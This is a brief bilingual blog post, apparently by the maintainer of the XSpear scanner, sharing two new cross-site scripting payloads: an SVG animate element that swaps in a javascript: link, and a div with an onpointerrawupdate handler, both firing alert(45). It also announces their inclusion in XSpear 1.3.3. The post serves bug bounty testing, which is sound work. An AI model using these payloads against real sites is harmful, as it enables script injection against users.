First new XSS Payload of 2020(svg animate, onpointerrawupdate)

Hi hackers and bugbounty hunter! Recently, two previously unknown XSS Payloads were disclosure one after another. It’s not a payload that’s very difficult to understand, so I’ll share it briefly! 최근 기존에 알려지지 않은 XSS Payload 2개가 연달아 공개됬습니다. 이해에 큰 어려움이 있는 페이로드는 아니니, 간략하게만 내용 공유할게요!

SVG Aniamte XSS

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values=";javascript:alert(45)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

onpointerrawupdate event handler for XSS

<div onpointerrawupdate=alert(45)>xss</div>

Updated XSpear (1.3.3)

I added this two payload in xspear. Please use it after the update. 2일전인가.. XSpear에는 반영해뒀습니다.

1.3.3으로 업데이트 후 사용하시면 기본적으로 포함됩니다 : )

gem update XSpear